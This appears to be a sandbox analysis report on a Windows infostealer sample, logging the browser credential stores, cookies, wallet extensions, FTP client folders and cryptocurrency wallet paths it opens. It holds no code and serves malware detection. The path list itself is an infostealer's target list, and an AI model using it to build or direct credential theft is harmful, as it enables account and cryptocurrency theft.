Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\GLTYDMDUST	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\GLTYDMDUST	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\GLTYDMDUST	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\GLTYDMDUST	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
